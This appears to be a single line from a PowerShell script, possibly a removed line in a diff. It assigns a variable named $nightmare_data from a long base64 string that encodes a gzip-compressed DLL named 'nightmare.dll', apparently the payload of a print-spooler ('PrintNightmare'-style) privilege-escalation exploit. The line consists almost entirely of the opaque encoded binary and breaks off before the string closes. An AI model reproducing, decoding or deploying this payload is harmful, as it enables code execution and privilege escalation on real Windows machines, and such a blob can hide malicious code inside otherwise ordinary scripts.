-    $nightmare_data = [System.Convert]::FromBase64String("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